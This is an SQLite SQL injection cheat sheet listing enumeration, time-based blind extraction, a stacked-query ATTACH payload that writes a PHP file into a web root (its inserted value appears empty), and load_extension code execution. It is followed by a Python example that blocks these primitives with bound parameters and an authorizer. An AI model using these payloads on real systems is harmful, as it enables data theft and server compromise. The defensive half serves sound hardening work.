
SQLite SQL Injection Cheat Sheet
If You Need to Use
Concatenation: ||
Comments: --
Conditionals: CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' END
Substring: substr(string, start, length) -- start is 1-based; the third argument is a length, not an end position
Length: length(string)
Quotes without literal quotes: cast(X'27' as text) -- use X'22' for double quotes
Table name enumeration: SELECT name FROM sqlite_master WHERE type='table'
Table schema enumeration: SELECT sql FROM sqlite_master WHERE type='table'
Time-based data extraction: cond='true' AND 1=randomblob(100000000) -- causes a time delay if cond='true'
File writing: 1'; ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('';-- -- requires either direct database access or the (non-default) stacked-query option to be enabled
Arbitrary Code Execution: load_extension(library_file, entry_point) -- .dll for Windows, .so for 'nix. This requires a non-default configuration.
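Seen from the defending side, each entry above depends on something the application can refuse. The following added example (not part of the original cheat sheet) uses Python's standard sqlite3 module to bind input as a parameter and to install an authorizer that denies ATTACH, sqlite_master reads, load_extension and randomblob; the users table, the function names and the choice to deny randomblob are assumptions made for the illustration.

```python
import sqlite3

# Constructed sample input: the opening of the cheat sheet's file-writing string.
HOSTILE = "1'; ATTACH DATABASE '/var/www/lol.php' AS lol;--"

def deny_cheat_sheet_primitives(action, arg1, arg2, dbname, source):
    """Authorizer callback: refuse the operations the cheat sheet relies on."""
    if action == sqlite3.SQLITE_ATTACH:
        return sqlite3.SQLITE_DENY  # file writing via ATTACH DATABASE
    if action == sqlite3.SQLITE_FUNCTION and arg2 in ("load_extension", "randomblob"):
        return sqlite3.SQLITE_DENY  # code loading and the time-delay primitive
    if action == sqlite3.SQLITE_READ and arg1 and arg1.startswith("sqlite_"):
        return sqlite3.SQLITE_DENY  # table and schema enumeration
    return sqlite3.SQLITE_OK

def open_hardened():
    """Create the (hypothetical) schema first, then lock the connection down."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users (name) VALUES ('alice')")
    conn.set_authorizer(deny_cheat_sheet_primitives)
    return conn

def find_user(conn, name):
    """Bound parameter: the value is compared as data, never parsed as SQL."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()

def is_blocked(conn, sql):
    """True if the statement is refused (authorizer, or execute()'s one-statement rule)."""
    try:
        conn.execute(sql).fetchall()
    except (sqlite3.Error, sqlite3.Warning):
        return True
    return False

if __name__ == "__main__":
    conn = open_hardened()
    print(find_user(conn, "alice"), find_user(conn, HOSTILE))
    for sql in ("SELECT name FROM sqlite_master WHERE type='table'",
                "ATTACH DATABASE ':memory:' AS lol",
                "SELECT load_extension('placeholder')",
                "SELECT 1 WHERE 1=randomblob(16)",
                "SELECT 1; SELECT 2"):
        print(is_blocked(conn, sql), sql)
```

Install the authorizer only after the application's own schema setup has run, since DDL statements also touch sqlite_master.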